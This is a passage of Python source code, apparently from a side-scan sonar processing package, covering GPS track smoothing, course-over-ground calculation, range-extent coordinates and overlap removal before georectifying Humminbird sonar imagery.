False\r\n\r\n return\r\n\r\n ############################################################################\r\n # Smooth GPS trackpoint coordinates #\r\n ############################################################################\r\n\r\n #=======================================================================\r\n def _interpTrack(self,\r\n df,\r\n dfOrig=None,\r\n dropDup=True,\r\n xlon='lon',\r\n ylat='lat',\r\n xutm='utm_e',\r\n yutm='utm_n',\r\n zU='time_s',\r\n filt=0,\r\n deg=3):\r\n '''\r\n Smooths 'noisy' ping trackpoints by completing the following:\r\n 1) Removes duplicate geographic coordinates;\r\n 2) Filter coordinates to reduce point density;\r\n 3) Fits n-degree spline to filtered coordinates;\r\n 4) Reinterpolate all input sonar records along the spline.\r\n\r\n Smoothed coordinates are reprojected into utm zone coordinates and course\r\n over ground (COG) is calculated.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n df : DataFrame\r\n DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n records.\r\n dfOrig : DataFrame : [Default=None]\r\n DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n records. If `None`, a copy of `df` will be used.\r\n dropDup : bool : [Default=True]\r\n DESCRIPTION - Flag indicating if coincident coordinates will be dropped.\r\n xlon : str : [Default='lon']\r\n DESCRIPTION - DataFrame column name for longitude coordinates.\r\n ylat : str : [Default='lat']\r\n DESCRIPTION - DataFrame column name for latitude coordinates.\r\n xutm : str : [Default='utm_e']\r\n DESCRIPTION - DataFrame column name for easting coordinates.\r\n yutm : str : [Default='utm_y']\r\n DESCRIPTION - DataFrame column name for northing coordinates.\r\n zU : str : [Default='time_s']\r\n DESCRIPTION - DataFrame column name used to reinterpolate coordinates\r\n along spline (i.e. determines spacing between coordinates)\r\n filt : int : [Default=0]\r\n DESCRIPTION - Every `filt` ping will be used to fit a spline.\r\n deg : int : [Default=3]\r\n DESCRIPTION - Indicates n-degree spline that will be fit to filtered\r\n coordinates.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n self.__init__()\r\n\r\n -------\r\n Returns\r\n -------\r\n Smoothed trackpoints in a Pandas DataFrame\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n self._getRangeCoords()\r\n '''\r\n\r\n lons = xlon+'s' # Name of smoothed longitude column in df\r\n lats = ylat+'s' # Name of smoothed latitude column in df\r\n es = xutm+'s' # Name of smoothed easting column in df\r\n ns = yutm+'s' # Name of smoothed northing column in df\r\n\r\n # Make copy of df to work on\r\n if dfOrig is None:\r\n dfOrig = df.copy()\r\n\r\n # Check for duplicate zU values. If there are duplicate zU values, then\r\n ## there will be pings that share smoothed lat/lon coordinates, which will\r\n ## result in a COG == 0, messing up rectification.\r\n zUvals = dfOrig[zU].to_numpy()\r\n u, c = np.unique(zUvals, return_counts=True)\r\n if len(u[c > 1]) > 0:\r\n dups = True\r\n else:\r\n dups = False\r\n\r\n # Drop duplicate coordinates\r\n if dropDup is True:\r\n df.drop_duplicates(subset=[xlon, ylat], inplace=True)\r\n\r\n # Extract every `filt` record, including last value\r\n if (filt>0) and (len(df)>filt):\r\n lastRow = df.iloc[-1].to_frame().T\r\n dfFilt = df.iloc[::filt]\r\n dfFilt = pd.concat([dfFilt, lastRow]).reset_index(drop=True)\r\n else:\r\n dfFilt = df.reset_index(drop=False)\r\n\r\n # Try smoothing trackline\r\n x=dfFilt[xlon].to_numpy(dtype='float64') # Store longitude coordinates in numpy array\r\n y=dfFilt[ylat].to_numpy(dtype='float64') # Store latitude coordinates in numpy array\r\n if dups is True:\r\n # Force unique zU value by multiplying time ellapsed and record number\r\n t = dfFilt[zU].to_numpy(dtype='float64') * dfFilt['record_num'].to_numpy(dtype='float64')\r\n u_interp = dfOrig[zU].to_numpy(dtype='float64') * dfOrig['record_num'].to_numpy(dtype='float64')\r\n else:\r\n t=dfFilt[zU].to_numpy(dtype='float64') # Store parameter values in numpy array. Used to space points along spline.\r\n u_interp = dfOrig[zU].to_numpy(dtype='float64') # Get all time ellapsed OR record number values from unfilterd df\r\n\r\n # Attempt to fix error\r\n # https://stackoverflow.com/questions/47948453/scipy-interpolate-splprep-error-invalid-inputs\r\n okay = np.where(np.abs(np.diff(x))+np.abs(np.diff(y))>0)\r\n x = np.r_[x[okay], x[-1]]\r\n y = np.r_[y[okay], y[-1]]\r\n t = np.r_[t[okay], t[-1]]\r\n\r\n # Check if enough points to interpolate\r\n # If not, too many overlapping pings\r\n if len(x) <= deg:\r\n # return dfOrig[['chunk_id', 'record_num', 'ping_cnt', 'time_s', 'pix_m']]\r\n return dfOrig[['chunk_id', 'record_num', 'ping_cnt', 'time_s']]\r\n\r\n # Fit a spline to filtered coordinates and parameterize with time ellapsed\r\n try:\r\n tck, _ = splprep([x,y], u=t, k=deg, s=0)\r\n except:\r\n # Time is messed up (negative time offset)\r\n # Parameterize with record num instead\r\n zU = 'record_num'\r\n t = dfFilt[zU].to_numpy()\r\n t = np.r_[t[okay], t[-1]]\r\n tck, _ = splprep([x,y], u=t, k=deg, s=0)\r\n u_interp = dfOrig[zU].to_numpy()\r\n\r\n # u_interp = dfOrig[zU].to_numpy() # Get all time ellapsed OR record number values from unfilterd df\r\n x_interp = splev(u_interp, tck) # Use u_interp to get smoothed x/y coordinates from spline\r\n\r\n u, indices, c = np.unique(u_interp, return_index= True,return_counts=True)\r\n for val in zip(c, u, indices):\r\n if val[0] > 1:\r\n print(val)\r\n\r\n # Store smoothed trackpoints in a dictionary\r\n smooth = {'chunk_id': dfOrig['chunk_id'],\r\n 'record_num': dfOrig['record_num'],\r\n 'ping_cnt': dfOrig['ping_cnt'],\r\n 'time_s': dfOrig['time_s'],\r\n 'pix_m': self.pixM,\r\n lons: x_interp[0],\r\n lats: x_interp[1],\r\n 'dep_m': dfOrig['dep_m']}\r\n\r\n sDF = pd.DataFrame(smooth) # Convert dictionary to Pandas df\r\n\r\n # Calculate smoothed easting/northing\r\n e_smth, n_smth = self.trans(sDF[lons].to_numpy(), sDF[lats].to_numpy())\r\n # Store in df\r\n sDF[es] = e_smth\r\n sDF[ns] = n_smth\r\n\r\n # Calculate COG (course over ground; i.e. heading) from smoothed lat/lon\r\n brng = self._getBearing(sDF, lons, lats)\r\n # self._getBearing() returns n-1 values because last ping can't\r\n ## have a COG value. We will duplicate the last COG value and use it for\r\n ## the last ping.\r\n last = brng[-1]\r\n brng = np.append(brng, last)\r\n sDF['cog'] = brng # Store COG in sDF\r\n\r\n return sDF\r\n\r\n #===========================================\r\n def _getBearing(self,\r\n df,\r\n lon = 'lons',\r\n lat = 'lats'):\r\n '''\r\n Calculates course over ground (COG) from a set of coordinates. Since the\r\n last coordinate pair cannot have a COG value, the length of the returned\r\n array is len(n-1) where n == len(df).\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n df : DataFrame\r\n DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n records.\r\n lon : str : [Default='lons']\r\n DESCRIPTION - DataFrame column name for longitude coordinates.\r\n lat : str : [Default='lats']\r\n DESCRIPTION - DataFrame column name for latitude coordinates.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._interpTrack()\r\n\r\n -------\r\n Returns\r\n -------\r\n Numpy array of COG values.\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Return to self._interpTrack()\r\n '''\r\n # COG calculation will be calculated on numpy arrays for speed. Since\r\n ## COG is calculated from one point to another (pntA -> pntB), we need\r\n ## to store pntA values, beginning with the first value and ending at\r\n ## second to last value, in one array and pntB values, beginning at second\r\n ## value and ending at last value, in another array. We can then use\r\n ## vector algebra to efficiently calculate COG.\r\n\r\n # Prepare pntA values [0:n-1]\r\n lonA = df[lon].to_numpy() # Store longitude coordinates in numpy array\r\n latA = df[lat].to_numpy() # Store longitude coordinates in numpy array\r\n lonA = lonA[:-1] # Omit last coordinate\r\n latA = latA[:-1] # Omit last coordinate\r\n pntA = [lonA,latA] # Store in array of arrays\r\n\r\n # Prepare pntB values [0+1:n]\r\n lonB = df[lon].to_numpy() # Store longitude coordinates in numpy array\r\n latB = df[lat].to_numpy() # Store longitude coordinates in numpy array\r\n lonB = lonB[1:] # Omit first coordinate\r\n latB = latB[1:] # Omit first coordinate\r\n pntB = [lonB,latB] # Store in array of arrays\r\n\r\n # Convert latitude values into radians\r\n lat1 = np.deg2rad(pntA[1])\r\n lat2 = np.deg2rad(pntB[1])\r\n\r\n diffLong = np.deg2rad(pntB[0] - pntA[0]) # Calculate difference in longitude then convert to degrees\r\n bearing = np.arctan2(np.sin(diffLong) * np.cos(lat2), np.cos(lat1) * np.sin(lat2) - (np.sin(lat1) * np.cos(lat2) * np.cos(diffLong))) # Calculate bearing in radians\r\n\r\n db = np.degrees(bearing) # Convert radians to degrees\r\n db = (db + 360) % 360 # Ensure degrees in range 0-360\r\n\r\n return db\r\n\r\n ############################################################################\r\n # Apply offset to coordinates #\r\n ############################################################################\r\n\r\n #===========================================\r\n def _applyPosOffset(self, x_offset, y_offset):\r\n '''\r\n Apply offset to smoothed coordinates to account for GPS and transducer\r\n offset.\r\n '''\r\n # Store necessary dataframe column names in variables\r\n lons = 'lons'\r\n lats = 'lats'\r\n bearing = 'cog'\r\n utm_es = 'utm_es'\r\n utm_ns = 'utm_ns'\r\n\r\n # Get smoothed trackline\r\n sDF = self.smthTrk\r\n\r\n #######################\r\n # Go along x-axis first\r\n\r\n R = 6371.393*1000 #Radius of the Earth in meters\r\n if x_offset < 0:\r\n rotate = 180\r\n else:\r\n rotate = 0\r\n\r\n brng = (sDF['cog']+rotate) % 360\r\n brng = np.deg2rad(brng)\r\n d = abs(x_offset)\r\n\r\n # Get lat/lon for origin of each ping, convert to numpy array\r\n lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n # Calculate position down boat x-axis\r\n # Calculate latitude of range extent\r\n lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n # Calculate longitude of range extent\r\n lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n lat2 = np.degrees(lat2)\r\n lon2 = np.degrees(lon2)\r\n\r\n sDF[lons] = lon2\r\n sDF[lats] = lat2\r\n\r\n ######################################\r\n # Calculate position along boat y-axis\r\n if y_offset > 0:\r\n rotate = 90\r\n else:\r\n rotate = -90\r\n\r\n brng = (sDF['cog']+rotate) % 360\r\n brng = np.deg2rad(brng)\r\n d = abs(y_offset)\r\n\r\n # Get lat/lon for origin of each ping, convert to numpy array\r\n lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n # Calculate position down boat x-axis\r\n # Calculate latitude of range extent\r\n lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n # Calculate longitude of range extent\r\n lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n lat2 = np.degrees(lat2)\r\n lon2 = np.degrees(lon2)\r\n\r\n sDF[lons] = lon2\r\n sDF[lats] = lat2\r\n\r\n # Calculate easting and northing\r\n e_smth, n_smth = self.trans(sDF[lons].to_numpy(), sDF[lats].to_numpy())\r\n # Store in dataframe\r\n sDF[utm_es] = e_smth\r\n sDF[utm_ns] = n_smth\r\n sDF = sDF.dropna() # Drop any NA's\r\n self.smthTrk = sDF # Store df in class attribute\r\n\r\n return\r\n\r\n ############################################################################\r\n # Calculate range extent coordinates #\r\n ############################################################################\r\n\r\n #===========================================\r\n def _getRangeCoords(self,\r\n flip = False,\r\n filt = 25):\r\n '''\r\n Humminbird SSS store one set geographic coordinates where each ping\r\n orriginates from (assuming GPS is located directly above sonar transducer).\r\n In order to georectify the sonar imagery, we need to know geographically\r\n where each ping terminates. The range (distance, length) of each\r\n ping is not stored in the Humminbird recording, so we estimate\r\n the size of one ping return (estimated previously in self._getPixSize)\r\n and multiply by the number of ping returns for each ping to\r\n estimate the range. Range coordinates for each ping are then\r\n estimated using the range of each ping, the coordinates where the\r\n ping originated, and the COG.\r\n\r\n A spline is then fit to filtered range coordinates, the same as the trackpoints,\r\n to help ensure no pings overlapm, resulting in higher quality sonar imagery.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n flip : bool : [Default=False]\r\n DESCRIPTION - Flip port and starboard sonar channels (if transducer\r\n was facing backwards duing survey).\r\n filt : int : [Default=25]\r\n DESCRIPTION - Every `filt` ping will be used to fit a spline.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n self._interpTrack()\r\n\r\n -------\r\n Returns\r\n -------\r\n A Pandas DataFrame with range extent coordinates stored in self.rangeExt\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n self._rectSon()\r\n '''\r\n # Store necessary dataframe column names in variables\r\n lons = 'lons'\r\n lats = 'lats'\r\n ping_cnt = 'ping_cnt'\r\n ping_bearing = 'ping_bearing'\r\n rlon = 'range_lon'\r\n rlat = 'range_lat'\r\n re = 'range_e'\r\n rn = 'range_n'\r\n range = 'range'\r\n chunk_id = 'chunk_id'\r\n\r\n self._loadSonMeta() # Load ping metadata\r\n sonMetaDF = self.sonMetaDF\r\n\r\n # Get smoothed trackline\r\n if not hasattr(self, 'smthTrk'):\r\n # if type(self.smthTrk) == str:\r\n self.smthTrk = pd.read_csv(self.smthTrkFile)\r\n else:\r\n pass\r\n sDF = self.smthTrk\r\n\r\n ########################\r\n # Calculate ping bearing\r\n # Determine ping bearing. Ping bearings are perpendicular to COG.\r\n if self.beamName == 'ss_port':\r\n rotate = -90 # Rotate COG by 90 degrees to the left\r\n else:\r\n rotate = 90 # Rotate COG by 90 degrees to the right\r\n if flip: # Flip rotation factor if True\r\n rotate *= -1\r\n\r\n # Calculate ping bearing and normalize to range 0-360\r\n sDF[ping_bearing] = (sDF['cog']+rotate) % 360\r\n\r\n ############################################\r\n # Calculate range (in meters) for each chunk\r\n # Calculate max range for each chunk to ensure none of the sonar image\r\n ## is cut off due to changing the range setting during the survey.\r\n chunk = sDF.groupby(chunk_id) # Group dataframe by chunk_id\r\n\r\n # Old method\r\n # maxPing = chunk[ping_cnt].max() # Find max ping count for each chunk\r\n # New method to find maxPing based on most numerous ping count\r\n maxPing = []\r\n for name, group in sDF.groupby(chunk_id):\r\n rangeCnt = np.unique(group[ping_cnt], return_counts=True)\r\n pingMaxi = np.argmax(rangeCnt[1])\r\n maxPing.append(int(rangeCnt[0][pingMaxi]))\r\n # Convert maxPing i to pd series\r\n maxPing = pd.Series(maxPing)\r\n\r\n # pix_m = chunk['pix_m'].min() # Get pixel size for each chunk\r\n pix_m = self.pixM # Get pixel size for each chunk\r\n for i in maxPing.index: # Calculate range (in meters) for each chunk\r\n sDF.loc[sDF[chunk_id]==i, range] = maxPing[i]*pix_m\r\n\r\n ##################################################\r\n # Calculate range extent coordinates for each ping\r\n # Calculate range extent lat/lon using ping bearing and range\r\n # https://stackoverflow.com/questions/7222382/get-lat-long-given-current-point-distance-and-bearing\r\n R = 6371.393*1000 #Radius of the Earth in meters\r\n brng = np.deg2rad(sDF[ping_bearing]).to_numpy() # Convert ping bearing to radians and store in numpy array\r\n d = (sDF[range].to_numpy()) # Store range in numpy array\r\n\r\n # Get lat/lon for origin of each ping, convert to numpy array\r\n lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n # Calculate latitude of range extent\r\n lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n # Calculate longitude of range extent\r\n lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n # Convert range extent coordinates into degrees\r\n lat2 = np.degrees(lat2)\r\n lon2 = np.degrees(lon2)\r\n\r\n # Store in dataframe\r\n sDF[rlon] = lon2\r\n sDF[rlat] = lat2\r\n\r\n # Calculate easting and northing\r\n e_smth, n_smth = self.trans(sDF[rlon].to_numpy(), sDF[rlat].to_numpy())\r\n # Store in dataframe\r\n sDF[re] = e_smth\r\n sDF[rn] = n_smth\r\n sDF = sDF.dropna() # Drop any NA's\r\n self.smthTrk = sDF # Store df in class attribute\r\n\r\n ##########################################\r\n # Smooth and interpolate range coordinates\r\n self._interpRangeCoords(filt)\r\n gc.collect()\r\n self._pickleSon()\r\n return #self\r\n\r\n #===========================================\r\n def _interpRangeCoords(self,\r\n filt = 25):\r\n '''\r\n This function fits a spline to the range extent coordinates. Before fitting\r\n the spline, overlapping pings are identified and removed to ensure spline\r\n does not have any loops. A spline is then fit for each individual chunk\r\n to avoid undesirable rectification effects caused by changing the range\r\n during a survey. The spline is used to reinterpolate range extent\r\n coordinates, ensuring no overlap between pings.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n filt : int : [Default=25]\r\n DESCRIPTION - Every `filt` ping will be used to fit a spline.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._interpRangeCoords()\r\n\r\n -------\r\n Returns\r\n -------\r\n A Pandas dataframe stored in self.rangeExt with smoothed trackline and\r\n range extent coordinates. This DataFrame is exported to .csv and overwrites\r\n Trackline_Smth_BXXX.csv.\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Returns smoothed coordinates to self._interpRangeCoords().\r\n '''\r\n # Store necessary dataframe column names in variables\r\n rlon = 'range_lon'\r\n rlons = rlon+'s'\r\n rlat = 'range_lat'\r\n rlats = rlat+'s'\r\n re = 'range_e'\r\n res = re+'s'\r\n rn = 'range_n'\r\n rns = rn+'s'\r\n\r\n sDF = self.smthTrk # Load smoothed trackline coordinates\r\n rDF = sDF.copy() # Make a copy to work on\r\n\r\n # Work on one chunk at a time\r\n for chunk, chunkDF in rDF.groupby('chunk_id'):\r\n chunkDF.reset_index(drop=True, inplace=True)\r\n\r\n # Extract every `filt` recording, including last value\r\n last = chunkDF.iloc[-1].to_frame().T\r\n chunkDF = chunkDF.iloc[::filt]\r\n chunkDF = pd.concat([chunkDF, last]).reset_index(drop=True)\r\n\r\n idx = chunkDF.index.tolist() # Store ping index in list\r\n maxIdx = max(idx) # Find last record index value\r\n\r\n drop = np.empty((len(chunkDF)), dtype=bool) # Bool numpy array to flag which sonar records overlap and should be dropped\r\n drop[:] = False # Prepopulate array w/ `False` (i.e. False==don't drop)\r\n\r\n #########################################\r\n # Find and drop overlapping sonar records\r\n for i in idx: # Iterate each ping if filtered dataframe\r\n if i == maxIdx: # Break loop once we reach the last ping\r\n break\r\n else:\r\n if drop[i] != True: # If current ping flagged to drop, don't need to check it\r\n dropping = self._checkPings(i, chunkDF) # Find subsequent sonar records that overlap current record\r\n if maxIdx in dropping.keys(): # Make sure we don't drop last ping in chunk\r\n del dropping[maxIdx]\r\n dropping[i]=True # Drop current ping instead\r\n else:\r\n pass\r\n if len(dropping) > 0: # We have overlapping sonar records we need to drop\r\n for k, v in dropping.items(): # Flag records to drop\r\n drop[k] = True\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n ######################################################\r\n # Drop all overlapping sonar records for current chunk\r\n chunkDF = chunkDF[~drop]\r\n\r\n rchunkDF = chunkDF.copy() # Make copy of df w/ no overlapping sonar records for current chunk\r\n schunkDF = sDF[sDF['chunk_id']==chunk].copy() # Get original df for current chunk\r\n\r\n #################################################\r\n # Smooth and interpolate range extent coordinates\r\n smthChunk = self._interpTrack(df=rchunkDF, dfOrig=schunkDF, xlon=rlon,\r\n ylat=rlat, xutm=re, yutm=rn, filt=0, deg=1)\r\n\r\n # Store smoothed range extent in output df\r\n if 'rsDF' not in locals(): # If output df doesn't exist, make it\r\n rsDF = smthChunk.copy()\r\n else: # If output df exists, append results to it\r\n rsDF = pd.concat([rsDF, smthChunk], axis=0).reset_index(drop=True)\r\n\r\n ##################################################\r\n # Join smoothed trackline to smoothed range extent\r\n # sDF = sDF[['record_num', 'chunk_id', 'ping_cnt', 'time_s', 'pix_m', 'lons', 'lats', 'utm_es', 'utm_ns', 'cog', 'dep_m']].copy()\r\n sDF = sDF[['record_num', 'chunk_id', 'ping_cnt', 'time_s', 'lons', 'lats', 'utm_es', 'utm_ns', 'cog', 'dep_m']].copy()\r\n sDF.rename(columns={'lons': 'trk_lons', 'lats': 'trk_lats', 'utm_es': 'trk_utm_es', 'utm_ns': 'trk_utm_ns', 'cog': 'trk_cog'}, inplace=True)\r\n rsDF.rename(columns={'cog': 'range_cog'}, inplace=True)\r\n rsDF = rsDF[['record_num', 'range_lons', 'range_lats', 'range_cog']]\r\n rsDF = sDF.set_index('record_num').join(rsDF.set_index('record_num'))\r\n\r\n # Calculate easting/northing for smoothed range extent\r\n e_smth, n_smth = self.trans(rsDF[rlons].to_numpy(), rsDF[rlats].to_numpy())\r\n rsDF[res] = e_smth # Store smoothed easting range extent in rsDF\r\n rsDF[rns] = n_smth # Store smoothed northing range extent in rsDF\r\n\r\n ###########################################\r\n # Overwrite Trackline_Smth_son.beamName.csv\r\n # outCSV = os.path.join(self.metaDir, \"Trackline_Smth_\"+self.beamName+\".csv\")\r\n outCSV = self.smthTrkFile\r\n rsDF.to_csv(outCSV, index=True, float_format='%.14f')\r\n\r\n self.rangeExt = rsDF # Store smoothed range extent in rectObj\r\n return #self\r\n\r\n #===========================================================================\r\n def _checkPings(self,\r\n i,\r\n df):\r\n '''\r\n On sinuous survey transects (i.e. river bends), it is possible for range\r\n extent coordinates to overlap with each other. Overlapping sonar records\r\n will produce issues during the georectification process and need to be\r\n removed. This function checks subsequent sonar records from the current\r\n index i and determines if the sonar records overlap with the current record.\r\n If they do, they are flagged for removal.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n i : int\r\n DESCRIPTION - Current index of ping which will be compared\r\n against subsequent sonar records.\r\n df : Pandas DataFrame\r\n DESCRIPTION - DataFrame containing range extent coordinates of sonar\r\n records.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._interpRangeCoords()\r\n\r\n -------\r\n Returns\r\n -------\r\n A dictionary containing dataframe index as key and bool value indicating\r\n if dataframe ping should be dropped or not.\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Returns dictionary to self._interpRangeCoords()\r\n '''\r\n range = 'range' # range distance\r\n x = 'range_e' # range easting extent coordinate\r\n y = 'range_n' # range northing extent coordinate\r\n dThresh = 'distThresh' # max distance to check for overlap\r\n tDist = 'track_dist' # straight line distance from ping i to subsequent sonar records\r\n toCheck = 'toCheck' # Flag indicating subsequent ping is close enough to i to check for potential overlap\r\n toDrop = 'toDrop' # Flag indicating ping overlaps with i\r\n es = 'utm_es' #Trackline smoothed easting\r\n ns = 'utm_ns' #Trackline smoothed northing\r\n\r\n ###########\r\n # Filter df\r\n rowI = df.loc[i] # Get current df row to compare against\r\n df = df.copy() # Make copy of dataframe\r\n df = df.iloc[df.index > i] # Filter out first (i.e. current) row\r\n\r\n #########################\r\n # Calc distance threshold\r\n ## We only need to check sonar records which are close enough to the\r\n ## current ping to potentially overlap.\r\n df[dThresh] = rowI[range] + df[range]\r\n\r\n # Calc straight line distance along the track from current ping\r\n ## to all other sonar records. It is impossible for overlap to occur for\r\n ## subsequent sonar records to overlap current ping if they are\r\n ## further then the threshold distance.\r\n rowIx, rowIy = rowI[x], rowI[y] # Get current ping range extent coordinates\r\n dfx, dfy = df[x].to_numpy(), df[y].to_numpy() # Get subsequent ping range extent coordinates\r\n dist = self._getDist(rowIx, rowIy, dfx, dfy) # Calculate distance from current ping\r\n\r\n # Check if dist < distThresh. True==Check for possible overlap; False==No need to check\r\n df[tDist] = dist # Store distance calculation\r\n df.loc[df[tDist] <= df[dThresh], toCheck] = True # Check for overlap\r\n df.loc[df[tDist] > df[dThresh], toCheck] = False # Don't check for overlap\r\n df[toCheck]=df[toCheck].astype(bool) # Make sure toCheck column is type bool\r\n\r\n # Determine which sonar records overlap with current ping\r\n line1 = ((rowI[es],rowI[ns]), (rowI[x], rowI[y])) # Store current ping coordinates as tuple\r\n dfFilt = df[df[toCheck]==True].copy() # Get sonar records that could overlap with current\r\n dropping = {} # Dictionary to store ping index to drop\r\n for i, row in dfFilt.iterrows(): # Iterate subsequent sonar records\r\n line2=((row[es], row[ns]), (row[x], row[y])) # Store ping coordinates to check in tuple\r\n isIntersect = self._lineIntersect(line1, line2, row[range]) # Determine if line1 intersects line2\r\n dfFilt.loc[i, toDrop] = isIntersect # Store bool in dataframe (don't need this but keeping in case)\r\n if isIntersect == True: # If line2 intersects line1, flag ping for dropping\r\n dropping[i]=isIntersect\r\n\r\n return dropping\r\n\r\n #===========================================================================\r\n def _getDist(self,\r\n aX,\r\n aY,\r\n bX,\r\n bY):\r\n '''\r\n Determine distance between two points `a` and `b`. `a` and `b` can also\r\n be numpy arrays of coordinates. This function is used to calculate distance\r\n between a single point `a` and a series of points `b` stored in numpy arrays.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n aX : float or numpy array of floats\r\n DESCRIPTION - X coordinate of point `a`\r\n aY : float or numpy array of floats\r\n DESCRIPTION - Y coordinate of point `a`\r\n bX : float or numpy array of floats\r\n DESCRIPTION - X coordinate of point `b`\r\n bY : float or numpy array of floats\r\n DESCRIPTION - Y coordinate of point `b`\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._checkPings() or self._lineIntersect()\r\n\r\n -------\r\n Returns\r\n -------\r\n A numpy array with distances calculated\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Returns numpy array to self._checkPings() or self._lineIntersect()\r\n '''\r\n dist = np.sqrt( (bX - aX)**2 + (bY - aY)**2) # Calculate distance\r\n return dist\r\n\r\n #===========================================================================\r\n def _lineIntersect(self,\r\n line1,\r\n line2,\r\n range):\r\n '''\r\n Determines if two lines intersect. Helper functions are included in this\r\n method to aid in computation:\r\n\r\n self._lineIntersect.line() : function\r\n DESCRIPTION - Determines coeficients describing line connecting two\r\n points.\r\n self._lineIntersect.intersection() : function\r\n DESCRIPTION - Determines if two (infinite) lines intersect and returns\r\n x, y coordinates of the intersection.\r\n self._lineIntersect.isBetween() : function\r\n DESCRIPTION - Determines if intersecting point falls on the line\r\n segments.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n line1 : tuple\r\n DESCRIPTION - Two sets of points describing a line ((x1, y1), (x2, y2))\r\n line2 : tuple\r\n DESCRIPTION - Two sets of points describing a line ((x1, y1), (x2, y2))\r\n range : float\r\n DESCRIPTION - Range (length) of line2\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._checkPings()\r\n\r\n -------\r\n Returns\r\n -------\r\n Bool flag indicating if line2 intersects line1\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Returns flag to self._checkPings()\r\n '''\r\n\r\n #https://stackoverflow.com/questions/20677795/how-do-i-compute-the-intersection-point-of-two-lines\r\n def line(p1, p2):\r\n # Find general equation (normal form) coeficients to describe a line\r\n ## connecting two points: Ay + Bx = C\r\n A = (p1[1] - p2[1])\r\n B = (p2[0] - p1[0])\r\n C = (p1[0]*p2[1] - p2[0]*p1[1])\r\n return A, B, -C\r\n\r\n def intersection(L1, L2):\r\n # Following Cramer's rules\r\n D = L1[0] * L2[1] - L1[1] * L2[0] # Determinant using x, y values\r\n Dx = L1[2] * L2[1] - L1[1] * L2[2] # Determinant using x, c values\r\n Dy = L1[0] * L2[2] - L1[2] * L2[0] # Determinant using y, c values\r\n if D != 0: # Check if divisor == 0\r\n x=Dx/D\r\n y=Dy/D\r\n return x,y # Coordinate of intersection\r\n else:\r\n return False # No intersection found\r\n\r\n def isBetween(line1, line2, c):\r\n ax, ay = line1[0][0], line1[0][1] # Get x,y for line1\r\n bx, by = line1[1][0], line2[1][1] # Get x,y for line2\r\n cx, cy = c[0], c[1] # Get x,y for intersection\r\n xIntersect=yIntersect=False # Set flags\r\n\r\n # Check if cx,cy falls between either lines coordinates with a small\r\n ## buffer of +-5. If it does, we will need to check distance between\r\n ## line2 origin and (cx,cy).\r\n if (cx >= min(ax,bx)-5) and (cx <= max(ax,bx)+5) and \\\r\n (cy >= min(ay,by)-5) and (cy <= max(ay,by)+5):\r\n checkDist = True\r\n else:\r\n checkDist = isIntersect = False\r\n\r\n # Check distance between line2 origin and (cx,cy). If the distance is\r\n ## shorter then the range, then intersecting point falls on line\r\n ## segments and the two lines do intersect.\r\n if checkDist is True:\r\n x,y = line2[0][0], line2[0][1]\r\n dist = self._getDist(x, y, cx, cy)\r\n if range < dist:\r\n isIntersect = False\r\n else:\r\n isIntersect = True\r\n\r\n return isIntersect\r\n\r\n L1 = line(line1[0], line1[1]) # Get coefficients for line1\r\n L2 = line(line2[0], line2[1]) # Get coefficients for line1\r\n c = intersection(L1, L2) # Determine if infinite lines could intersect\r\n if c is True:\r\n I = isBetween(line1, line2, c) # Determine if intersect occurs on line segments\r\n else:\r\n I = False\r\n return I\r\n\r\n ############################################################################\r\n # Rectify sonar imagery #\r\n ############################################################################\r\n\r\n def _rectSonParallel(self,\r\n chunk,\r\n filt=50,\r\n wgs=False,\r\n son=True):\r\n '''\r\n This function will georectify sonar tiles with water column present\r\n (rect_wcp) OR water column removed and slant range corrected (rect_wcr).\r\n Sonar intensity will be loaded directly from the .SON file. Once\r\n determined, each chunk will be iterated, sonar intensities loaded into\r\n memory and:\r\n 1) Pixel (pix) coordinates are formated as a numpy array based on shape\r\n of sonar 